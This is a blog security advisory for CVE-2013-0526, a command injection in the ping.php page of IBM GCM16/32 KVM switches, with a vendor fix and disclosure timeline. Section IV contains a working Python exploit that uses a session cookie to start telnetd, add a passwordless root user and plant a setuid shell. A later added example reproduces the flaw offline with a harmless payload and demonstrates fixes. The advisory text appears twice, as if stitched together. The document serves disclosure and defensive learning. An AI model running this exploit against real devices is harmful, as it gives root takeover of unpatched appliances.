I. Product description

The IBM 1754 GCM products combine KVM over IP and serial console management technology in a single appliance.

II. Vulnerability information
Impact: Command execution
Remotely exploitable: yes
CVE: 2013-0526
CVSS score: 8.5

III. Vulnerability details

GCM16 devices running firmware 1.18.0.22011 and earlier contain a flaw that allows a remote, authenticated attacker to execute commands with root privileges.
The flaw exists because the web application does not sanitise its input variables. In this case the $count and $size parameters of ping.php allow a specially crafted POST request to inject commands into a PHP exec() call, which can then be used to run arbitrary commands on the KVM's operating system.


IV. Proof of concept

Below is a simple exploit that starts a telnet server on the KVM and creates a user with root privileges and no password. The sessid and target variables are hard-coded and must be changed.



#!/usr/bin/env python3

"""
This exploit for the Avocent-based IBM GCM16/32 KVM switch gives root access to the embedded device.
A session id (the avctSessionId cookie) is necessary for this to work, so you need a valid user. The default user is "Admin" with a blank password.
After running the exploit, connect to the device with telnet as user target (password: target), then run "/tmp/su - superb" to become root.
"""

from io import BytesIO
import re
import sys

import pycurl

# Both values are hard-coded placeholders: set a valid avctSessionId cookie and the device URL.
sessid = "XXXXXXXXX"
target = "https://ip.of.kvm/ping.php"

# Payload executed as root by ping.php: start telnetd, append a passwordless uid-0 user
# and drop a setuid copy of busybox so that "/tmp/su - superb" works from the telnet login.
command = ("/sbin/telnetd ; echo superb::0:0:owned:/:/bin/sh >> /etc/passwd ; "
           "cp /bin/busybox /tmp/su ; chmod 6755 /tmp/su ; "
           "echo done. now connect to device using telnet with user target and pass target, "
           "then \"/tmp/su - superb\"")

storage = BytesIO()
c = pycurl.Curl()
c.setopt(c.URL, target)
# The appliance ships a self-signed certificate, so TLS verification is disabled.
c.setopt(c.SSL_VERIFYPEER, 0)
c.setopt(c.SSL_VERIFYHOST, 0)
c.setopt(c.WRITEFUNCTION, storage.write)
# The injection point is the unsanitised count parameter; the "*E*" markers delimit the output of the injected commands.
c.setopt(c.POSTFIELDS, 'address=255.255.255.255&action=ping&size=56&count=1 ; echo *E* ; ' + command + ' ; echo *E*')
c.setopt(c.COOKIE, 'avctSessionId=' + sessid)

try:
    c.perform()
except pycurl.error as e:
    print("request failed: %s" % (e,))
    sys.exit(1)
finally:
    c.close()

content = storage.getvalue().decode("utf-8", "replace")
# Everything between the two markers is the output of the injected commands; the
# device renders newlines as <br /> tags, so undo that before printing.
x1 = re.search(r"\*E\*(.*)\*E\*", content, re.S)
if x1 is None:
    print("no output markers in the response; check sessid and target:")
    print(content)
    sys.exit(1)
print(x1.group(1).replace("<br />", "\n"))


V. Vendor response
IBM released new firmware that fixes this vulnerability (1.20.0.22575).

VI. Timeline
2013-06-12 - IBM PSIRT notified.
2013-06-12 - IBM assigns an internal ID.
2013-07-02 - IBM confirms the vulnerability.
2013-08-16 - IBM publishes the patch. The vulnerability is disclosed publicly.

VII. External information


This is the advisory in English:

Subject: CVE-2013-0526 IBM GCM16/32 remote command execution.

I. Product description

The IBM 1754 GCM family provides KVM over IP and serial console management technology in a single appliance.

II. Vulnerability information

Impact: Command execution
Remotely exploitable: yes
CVE: 2013-0526

III. Vulnerability details

GCM16 (v.1.18.0.22011) and older versions of this KVM switch contain a flaw that allows a remote authenticated user to execute unauthorised commands as root.
This flaw exists because web application variables are not sanitised. In this case, the $count and $size parameters of ping.php allow a specially crafted request to inject text into an exec() call, so they can be used to execute arbitrary commands on the KVM's embedded Linux.
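The following is an added example, not code from the advisory or from IBM/Avocent. The page does not show the PHP behind ping.php, so build_ping_vulnerable() reconstructs the exec("ping -s $size -c $count $address") pattern the advisory describes, in Python, feeds it a POST body constructed in the shape the proof of concept sends (with the root payload swapped for a harmless echo), and contrasts it with the two usual fixes: shell-quoting each field (PHP's escapeshellarg()) and, better, allowlist validation plus an argv list that never touches a shell. Everything runs offline; ping itself is expected to fail, which does not stop the commands injected after it.

```python
#!/usr/bin/env python3
"""Illustration of the ping.php injection pattern and two fixes (added example;
the device's real PHP source is not on the page, so build_ping_vulnerable() is a
reconstruction of exec("ping -s $size -c $count $address") in Python)."""
import ipaddress
import re
import shlex
import subprocess
import tempfile
from urllib.parse import unquote_plus

MARK = "*E*"  # the PoC brackets the injected commands' output with this marker

# Constructed POST body in the shape the PoC sends; the root payload is replaced
# by a harmless "echo injected" so this runs safely offline.
POC_BODY = ("address=255.255.255.255&action=ping&size=56"
            "&count=1 ; echo *E* ; echo injected ; echo *E*")


def parse_form(body):
    """Decode a form-urlencoded body the way PHP populates $_POST."""
    fields = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        fields[unquote_plus(key)] = unquote_plus(value)
    return fields


def build_ping_vulnerable(address, size, count):
    """The flaw: user input interpolated straight into a shell command line."""
    return "ping -s {} -c {} {}".format(size, count, address)


def build_ping_quoted(address, size, count):
    """Minimal fix: shell-quote every field (PHP equivalent: escapeshellarg())."""
    return "ping -s {} -c {} {}".format(
        shlex.quote(size), shlex.quote(count), shlex.quote(address))


def build_ping_argv(address, size, count):
    """Preferred fix: allowlist each value and pass an argv list, so no shell is
    involved at all (PHP: validated intval() values, or proc_open() with an array)."""
    if not (count.isdigit() and 1 <= int(count) <= 10):
        raise ValueError("count must be an integer between 1 and 10")
    if not (size.isdigit() and int(size) <= 65507):
        raise ValueError("size must be an integer up to 65507")
    ipaddress.ip_address(address)  # raises ValueError for anything but an IP
    return ["ping", "-s", size, "-c", count, address]


def run_in_shell(cmd):
    """Run a command line through /bin/sh as PHP exec() does; return stdout.
    ping is expected to fail here (no destination or no binary); an empty
    scratch cwd stops the shell from glob-expanding the unquoted '*E*' marker."""
    with tempfile.TemporaryDirectory() as cwd:
        proc = subprocess.run(["sh", "-c", cmd], cwd=cwd,
                              capture_output=True, text=True)
    return proc.stdout


def extract_between_markers(output):
    """The PoC's post-processing: text between the two markers, or None."""
    pattern = re.escape(MARK) + r"\n(.*?)\n" + re.escape(MARK)
    match = re.search(pattern, output, re.S)
    return match.group(1) if match else None


def demo(body=POC_BODY):
    """Feed the same payload to all three builders and report what happened."""
    f = parse_form(body)
    args = (f["address"], f["size"], f["count"])
    injected = extract_between_markers(run_in_shell(build_ping_vulnerable(*args)))
    quoted = extract_between_markers(run_in_shell(build_ping_quoted(*args)))
    try:
        build_ping_argv(*args)
        rejected = False
    except ValueError:
        rejected = True
    return {"vulnerable": injected, "quoted": quoted, "argv_rejected": rejected}


if __name__ == "__main__":
    print(demo())  # {'vulnerable': 'injected', 'quoted': None, 'argv_rejected': True}
```

With the vulnerable builder the shell sees four commands and "injected" comes back between the markers; with the quoted builder ping receives the whole string as its -c argument and simply errors out; the argv builder rejects it before anything runs. One caveat that also applies to the real PoC: `echo *E*` is unquoted, so if the working directory of the web server process contains a file whose name includes "E", the shell expands the marker and the extraction regex never matches.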

IV. Proof of concept

The proof of concept is the same script given in section IV above: it opens a telnet server on the device and creates a root user with no password (sessid and target are hard-coded, so they must be changed for it to work).


V. Vendor Response
IBM released a new firmware that corrects this vulnerability (1.20.0.22575).

VI. Timeline
2013-06-12 - Vendor (IBM PSIRT) notified.
2013-06-12 - Vendor assigns internal ID.
2013-07-02 - Vendor confirms the vulnerability.
2013-08-16 - Vulnerability disclosed and patch released.

VII. External information

Information about this vulnerability (in Spanish): http://www.bitcloud.es/2013/08/vulnerabilidad-en-kvms-gcm1632-de-ibm.html



Nube de Bits, 2011. Powered by Blogger.